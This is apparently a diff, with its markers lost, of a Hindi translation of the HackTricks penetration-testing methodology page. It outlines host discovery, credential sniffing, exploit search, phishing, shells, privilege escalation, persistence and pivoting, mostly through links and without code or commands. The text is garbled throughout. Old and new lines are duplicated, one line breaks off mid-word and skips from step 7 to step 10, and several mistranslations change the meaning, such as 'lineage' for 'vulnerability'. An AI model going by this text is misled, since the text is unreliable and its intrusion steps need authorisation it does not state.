अगर आप **हैकिंग करियर** में रुचि रखते हैं और अहैकेबल को हैक करना चाहते हैं - **हम भर्ती कर रहे हैं!** (_फ्लूएंट पोलिश लिखित और बोली जरुरी है_).
अगर आप **हैकिंग करियर** में रुचि रखते हैं और अहैकेबल को हैक करना चाहते हैं - **हम भर्ती कर रहे हैं!** (_फ्लूएंट पोलिश लिखने और बोलने की आवश्यकता है_).
{% embed url="https://www.stmcyber.com/careers" %}
@ -28,63 +28,63 @@ _Hacktricks लोगो डिज़ाइन किया गया है_ [_
### 0- भौतिक हमले
क्या आपके पास वह मशीन का **भौतिक पहुंच** है जिसे आप हमला करना चाहते हैं? आपको कुछ [**भौतिक हमलों के बारे में ट्रिक्स**](../hardware-physical-access/physical-attacks.md) और [**GUI एप्लिकेशन से बचने के बारे में**](../hardware-physical-access/escaping-from-gui-applications.md) पढ़ना चाहिए।
क्या आपके पास उस मशीन का **भौतिक पहुंच** है जिसे आप हमला करना चाहते हैं? आपको कुछ [**भौतिक हमलों के बारे में ट्रिक्स**](../hardware-physical-access/physical-attacks.md) और [**GUI एप्लिकेशन से बचने के बारे में**](../hardware-physical-access/escaping-from-gui-applications.md) पढ़ना चाहिए।
### 1 - [नेटवर्क के अंदर होस्ट की खोज](pentesting-network/#discovering-hosts)/ [कंपनी क संपत्तियों की खोज](external-recon-methodology/)
### 1 - [नेटवर्क के अंदर होस्ट की खोज](pentesting-network/#discovering-hosts)/ [कंपनी क संपत्तियों की खोज](external-recon-methodology/)
**यह निर्धारित करना** कि यदि आपका **टेस्ट** आप **आंतरिक या बाह्य टेस्ट** कर रहे हैं, तो आपको **कंपनी नेटवर्क के अंदर होस्ट** (आंतरिक टेस्ट) या **कंपनी की संपत्तियों की खोज** करने में रुचि हो सकती है।
**यह निर्धारित करने पर निर्भर करता है** कि आपके द्वारा किया जा रहा **टेस्ट** एक **आंतरिक या बाह्य टेस्ट** है कि आपको कंपनी नेटवर्क के **अंदर होस्ट खोजने** (आंतरिक टेस्ट) या **कंपनी की संपत्तियों को इंटरनेट पर खोजने** (बाह्य टेस्ट) में रुचि हो सकती है।
{% hint style="info" %}
ध्यान दें कि अगर आप एक बाह्य टेस्ट कर रहे हैं, एक बार जब आप कंपनी के आंतरिक नेटवर्क तक पहुंच जाते हैं तो आपको इस गाइड को फिर से शुरू करना चाहिए।
{% endhint %}
### **2-** [**नेटवर्क के साथ मजा करना**](pentesting-network/) **(आंतरिक)**
### **2-** [**नेटवर्क के साथ मजा करना**](pentesting-network/) **(आंतरिक)**
**यह खंड केवल उस समय लागू होता है जब आप आंतरिक टेस्ट कर रहे हैं।**\
किसी होस्ट को हमला करने से पहले शायद आप पसंद करेंगे कि आप **नेटवर्क से कुछ प्रमाणपत्र चुरा लें** या कुछ **डेटा स्निफ** करें ताकि आप नेटवर्क के अंदर क्या पा सकते हैं, पैशनेटली/एक्टिवली(MitM) सीख सकते हैं। आप [**पेंटेस्टिंग नेटवर्क**](pentesting-network/#sniffing) पढ़ सकते हैं।
किसी होस्ट को हमला करने से पहले शायद आप पसंद करेंगे कि आप **नेटवर्क से कुछ प्रमाणपत्र चुरा लें** या कुछ **डेटा स्निफ़** करें पासिव / सक्रिय (MitM) कुछ पाने के लिए **नेटवर्क के अंदर क्या मिल सकता है**। आप [**पेंटेस्टिंग नेटवर्क**](pentesting-network/#sniffing) पढ़ सकते हैं।
### 3- [पोर्ट स्कैन - सेवा खोज](pentesting-network/#scanning-hosts)
**किसी होस्ट में विकल्पताओं की खोज करते समय** पहली चीज है कि आपको पता होना चाहिए कि कौन सी **सेवाएं किस पोर्ट में चल रही हैं**। चलिए देखते हैं [**होस्ट के पोर्ट स्कैन करने के लिए मूल उपकरण**](pentesting-network/#scanning-hosts)।
**किसी होस्ट में वंरूपताओं की खोज करते समय** पहली चीज है कि आपको पता होना चाहिए कि कौन सी **सेवाएं किस पोर्ट में चल रही हैं**। चलिए देखते हैं [**होस्ट के पोर्ट स्कैन करने के लिए मूल उपकरण**](pentesting-network/#scanning-hosts)।
### **4-** [सेवा संस्करण एक्सप्लॉइट्स खोजना](search-exploits.md)
एक बार जब आपको पता चल जाता है कि कौन सी सेवाएं चल रही हैं, और शायद उनका संस्करण भी, तो आपको **जाने माने वंशवादों की खोज करनी होगी**। शायद आपको भाग्यशाली हो और एक एक्सप्लॉइट मिल जाए जो आपको एक शैल देने के लिए है...
एक बार जब आपको पता चल जाता है कि कौन सी सेवाएं चल रही हैं, और शायद उनका संस्करण, तो आपको **जाने माने वंरूपताओं की खोज करनी होगी**। शायद आपको भाग्यशाली हो और एक एक्सप्लॉइट मिल जाए जो आपको एक शैल देने के लिए है...
### **5-** सेवाएं पेंटेस्टिंग
यदि किसी भी चल रही सेवा के लिए कोई फैंसी एक्सप्लॉइट नहीं है, तो आपको हर सेवा में **सामान्य misconfigurations** खोजनी चाहिए।
अगर किसी चल रही सेवा के लिए कोई फैंसी एक्सप्लॉइट नहीं है, तो आपको **हर सेवा में सामान्य misconfigurations खोजनी चाहिए**
**इस पुस्तक में आपको सबसे सामान्य सेवाओं का पेंटेस्ट करने के लिए एक मार्गदर्शिका मिलेगी** (और अन्य जो इतनी सामान्य नहीं हैं)**। कृपया, बाएं सूची में** _**PENTESTING**_ **खंड** (सेवाएं उनके डिफ़ॉल्ट पोर्ट्स के अनुसार क्रमबद्ध हैं) **खोजें।**
**मैं वेब पेंटेस्टिंग**](../network-services-pentesting/pentesting-web/) **भाग पर विशेष रूप से ध्यान देना चाहता हूँ।**\
इसके अलावा, यहाँ पर [**सॉफ़्टवेयर में जाने माने वंशवादों को खोजने के लिए एक छोटे से मार्गदर्शिका**](search-exploits.md) मिलेगी
**मैं वेब के** [**Pentesting Web**](../network-services-pentesting/pentesting-web/) **भाग का विशेष उल्लेख करना चाहता हूँ (क्योंकि यह सबसे व्यापक है)**\
इसके अलावा, यहाँ एक छोटे मार्गदर्शिका है कि [**सॉफ़्टवेयर में जाने माने वंरूपताओं को कैसे खोजें**](search-exploits.md)
**अगर आपकी सेवा सूची में नहीं है, तो Google में** अन्य ट्यूटोरियल्स के लिए खोजें और **मुझे बताएं यदि आप इसे जोड़ना चाहते हैं।** अगर आप **Google में कुछ नहीं** पा सकते, तो अपन**अपनी अंधा पेंटेस्टिंग** करें, आप सेवा से कनेक्ट करने की शुरुआत कर सकते हैं, उसे fuzz कर सकते हैं और जवाब पढ़ सकते हैं (अगर कोई हो)।
**अगर आपकी सेवा सूची में नहीं है, तो Google में खोजें** अन्य ट्यूटोरियल्स के लिए और **मुझे बताएं यदि आप इसे जोड़ना चाहते हैं।** अगर आप **Google में कुछ नहीं** पा सकते, तो अपन**अपना ब्लाइंड पेंटेस्टिंग** करें, आप सेवा से कनेक्ट करने की शुरुआत कर सकते हैं, उसे fuzz कर सकते हैं और जवाब पढ़ सकते हैं (अगर कोई हो)।
#### 5.1 स्वचालित उपकरण
कई उपकरण भी हैं जो **स्वचालित वंशवाद मूल्यांकन** कर सकते हैं**मैं आपको सिफारिश करूंगा** [**Legion**](https://github.com/carlospolop/legion)** को आज़माने के लिए, जो मेरे द्वारा बनाया गया उपकरण है और यह पुस्तक में पाए जाने वाले सेवाओं के पेंटेस्टिंग के बारे में नोट्स पर आधारित है।**
कई उपकरण भी हैं जो **स्वचालित वंरूपताओं का मूल्यांकन कर सकते हैं****मैं आपको सिफारिश करूंगा** [**Legion**](https://github.com/carlospolop/legion)** का प्रयास करने के लिए, जो उस उपकरण पर आधारित है जिसके बारे में नोट्स हैं जो आप इस पुस्तक में पा सकते हैं।**
#### **5.2 सेवाओं का ब्रूट-फोर्सिंग**
कुछ परिदृश्यों में एक **ब्रूट-फोर्स** एक सेवा को **कंप्रमाइज़** करने के लिए उपयोगी हो सकता है। [**यहाँ एक विभिन्न सेवाओं के ब्रूट फोर्सिंग का चीटशीट मिलेगी**](brute-force.md)**।**
कुछ स्थितियों में एक **ब्रूट-फोर्स** एक सेवा को **कंप्रमाइज़** करने के लिए उपयोगी हो सकता है। [**यहाँ विभिन्न सेवाओं के ब्रूट फोर्सिंग का चीटशीट पाएं**](brute-force.md)**।**
### 6- [फिशिंग](phishing-methodology/)
यदि इस समय तक आपने कोई दिलचस्प वंशवाद नहीं पाया है तो आपको **नेटवर्क के अंदर पहुंचने के लिए कुछ फिशिंग करने की आवश्यकता हो सकती है**। आप मेरी फिशिंग मेथडोलॉजी [यहाँ](phishing-methodology/) पढ़ सकते हैं:
यदि इस समय तक आपने कोई दिलचस्प वंरूपता नहीं पाई है तो आपको संभावना है कि आपको नेटवर्क के अंदर पहुंचने के लिए कुछ फिशिंग करनी पड़ेगी। आप मेरी फिशिंग मेथडोलॉजी [यहाँ](phishing-methodology/) पढ़ सकते हैं:
### **7-** [**शैल को प्राप्त करना**](shells/)
किसी तरह से आपको विक्टिम में कोड निष्पादित करने का कोई तरीका मिल जाना चाहिए। फिर, [विक्टिम में उपयोग करने के लिए कुछ संभावित उपकरणों की सूची बहुत उपयोगी होगी](shells/)।
किसी तरह से आपको शिकायत करनी चाहिए कि आपने पीड़ित में कोड निष्पादित करने का कोई तरीका पाया है। फिर, [पीड़ित के सिस्टम में मौजूद संभावित उपकरणों की सूची बहुत उपयोगी होगी](shells/)।
िशेष रूप से Windows में आपको **एंटीवायरस से बच
### **10- विशेषाधिकार उन्नयन**
#### **10.1- स्थानीय उन्नयन**
यदि आप बॉक्स के अंदर **रूट/प्रशासक नहीं** हैं, तो आपको **विशेषाधिकारों को उन्नत करने का एक तरीका ढूंढना चाहिए।**\
यहाँ आप एक गाइड पा सकते हैं जिसमें बताया गया है कि कैसे **स्थानीय रूप से विशेषाधिकारों को उन्नत किया जाए** [**Linux**](../linux-hardening/privilege-escalation/) **और** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)** में।**\
यहाँ आप यहाँ स्थानीय रूप से विशेषाधिकारों को उन्नत करने के लिए एक **मार्गदर्शिका पा सकते हैं** [**Linux**](../linux-hardening/privilege-escalation/) **और** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)** में।**\
आपको यह भी देखना चाहिए कि **Windows कैसे काम करता है**:
* [**प्रमाणीकरण, परिचय, टोकन विशेषाधिकार और UAC**](../windows-hardening/authentication-credentials-uac-and-efs/)
@ -96,28 +96,28 @@ _Hacktricks लोगो डिज़ाइन किया गया है_ [_
#### **10.2- डोमेन उन्नयन**
यहाँ आप एक [**मार्गदर्शिका पा सकते हैं जो एक एक्टिव डायरेक्टरी पर जांच, विशेषाधिकारों को उन्नत करने और स्थिर रहने के सबसे सामान्य कार्रवाईयों को समझाती है**](../windows-hardening/active-directory-methodology/)। यद्यपि यह केवल एक खंड का एक उपखंड है, लेकिन यह प्रक्रिया एक पेंटेस्टिंग/रेड टीम असाइनमेंट पर **अत्यंत संवेदनशील** हो सकती है।
यहाँ आप एक [**मार्गदर्शिका पा सकते हैं जो एक एक्टिव डायरेक्टरी पर जांच करने, विशेषाधिकारों को उन्नत करने और स्थिर रहने के सबसे सामान्य कार्रवाईयों को समझाती है**](../windows-hardening/active-directory-methodology/)। यद्यपि यह केवल एक खंड का एक उपखंड है, यह प्रक्रिया **पेंटेस्टिंग/रेड टीम असाइनमेंट पर अत्यंत संवेदनशील** हो सकती है।
### 11 - POST
#### **11**.1 - लूटिंग
जांचें कि क्या आप **मेज़ में अधिक पासवर्ड** ढूंढ सकते हैं या क्या आपके **उपयोगकर्ता** की **विशेषाधिकारों** के साथ **अन्य मशीनों तक पहुंच** है।\
यहाँ विभिन्न तरीके हैं [**Windows में पासवर्ड डंप करने के लिए**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md)।
जांचें कि क्या आप मेज़ में और अन्य मशीनों में अपने उपयोगकर्ता की **विशेषाधिकारों** के साथ अधिक **पासवर्ड** ढूंढ सकते हैं या नहीं।\
यहाँ आप यहाँ विभिन्न तरीके पा सकते हैं [**Windows में पासवर्ड डंप करने के लिए**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md)।
#### 11.2 - स्थिरता
**2 या 3 विभिन्न प्रकार के स्थिरता तंत्र का उपयोग करें ताकि आपको पुनः सिस्टम का उत्पीड़न करने की आवश्यकता न हो।**\
**2 या 3 विभिन्न प्रकार के स्थिरता तंत्र का उपयोग करें ताकि आपको पुनः प्रणाली का शिकार नहीं बनना पड़े।**\
**यहाँ आप कुछ** [**एक्टिव डायरेक्टरी पर स्थिरता ट्रिक्स पा सकते हैं**](../windows-hardening/active-directory-methodology/#persistence)**।**
TODO: Windows और Linux में स्थिरता पोस्ट पूरी करें
### 12 - पिवोटिंग
**जुटाए गए प्रमाणपत्रों** के साथ आपको अन्य मशीनों तक पहुंच हो सकती है, या शायद आपको **नए नेटवर्क्स में जुटे अपने पीड़ित के साथ पुनः विकसित और स्कैन करने की आवश्यकता हो सकती है** (पेंटेस्टिंग मेथडोलॉजी फिर से शुरू करें)।\
इस मामले में टनलिंग आवश्यक हो सकत है। यहाँ आप [**टनलिंग के बारे में एक पोस्ट पा सकते हैं**](tunneling-and-port-forwarding.md)।\
निश्चित रूप से आपको यह भी देखना चाहिए [**एक्टिव डायरेक्टरी पेंटेस्टिंग मेथडोलॉजी**](../windows-hardening/active-directory-methodology/) के बारे में पोस्ट, वहाँ आपको लैटरली चलने, विशेषाधिकारों को उन्नत करने और क्रेडेंशियल्स डंप करने के लिए शानदार ट्रिक्स मिलेंग।\
[**NTLM**](../windows-hardening/ntlm/) के बारे में भी पृष्ठ जांचें, यह Windows वातावरण में पिवोट करने के लिए बहुत उपयोगी हो सकता है।
**जुटाए गए प्रमाणीकरण** के साथ आपको अन्य मशीनों तक पहुंच हो सकती है, या शायद आपको नए नेटवर्क्स में जुड़े अपने पीड़ित के अंदर फिर से **नए होस्ट्स की खोज और स्कैन करने की आवश्यकता हो सकती है** (पेंटेस्टिंग मेथडोलॉजी फिर से शुरू करें)।\
इस मामले में टनलिंग आवश्यक हो सकत है। यहाँ आप [**टनलिंग के बारे में एक पोस्ट पा सकते हैं**](tunneling-and-port-forwarding.md)।\
निश्चित रूप से आपको यह भी देखना चाहिए [**एक्टिव डायरेक्टरी पेंटेस्टिंग मेथडोलॉजी**](../windows-hardening/active-directory-methodology/) के बारे में पोस्ट। वहाँ आपको लेटरली मूव करने, विशेषाधिकारों को उन्नत करने और क्रेडेंशियल्स डंप करने के लिए शानदार ट्रिक्स मिलेंग।\
[**NTLM**](../windows-hardening/ntlm/) के बारे में पेज भी जांचें, यह Windows वातावरण में पिवोट करने के लिए बहुत उपयोगी हो सकता है।
### अधिक
@ -125,11 +125,11 @@ TODO: Windows और Linux में स्थिरता पोस्ट प
#### **शोषण**
* [**मेज़ में अधिक पासवर्ड**](../binary-exploitation/linux-exploiting-basic-esp.md) ढूंढें
* [**बुनियादी Windows एक्सप्लॉइटिंग**](../binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md)
* [**बुनियादी एक्सप्लॉइटिंग उपकरण**](../binary-exploitation/basic-binary-exploitation-methodology/tools/)
* [**मूल रूप से लिनक्स शोषण**](broken-reference)
* [**मूल विंडोज शोषण**](../binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md)
* [**मूल शोषण उपकरण**](../binary-exploitation/basic-stack-binary-exploitation-methodology/tools/)
#### [**बुनियादी Python**](python/)
#### [**मूल पायथन**](python/)
#### **क्रिप्टो ट्रिक्स**
@ -137,9 +137,9 @@ TODO: Windows और Linux में स्थिरता पोस्ट प
* [**CBC-MAC**](../crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md)
* [**पैडिंग ऑरेकल**](../crypto-and-stego/padding-oracle-priv.md)
<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
यदि आप **हैकिंग करियर** में रुचि रखते हैं और अहैकेबल को हैक करना चाहते हैं - **हम नियुक्ति कर रहे हैं!** (_चुस्त पोलिश लिखने और बोलने की आवश्यकता है_).
यदि आप **हैकिंग करियर** में रुचि रखते हैं और अहैकिंग करना चाहते हैं - **हम नियुक्ति कर रहे हैं!** (_चुस्त पोलिश लिखने और बोलने की आवश्यकता है_).
{% embed url="https://www.stmcyber.com/careers" %}
@ -149,10 +149,10 @@ TODO: Windows और Linux में स्थिरता पोस्ट प
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारा संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) के अनन्य [**NFTs**](https://opensea.io/collection/the-peass-family) की खोज करें
* यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* **अपने हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
</details>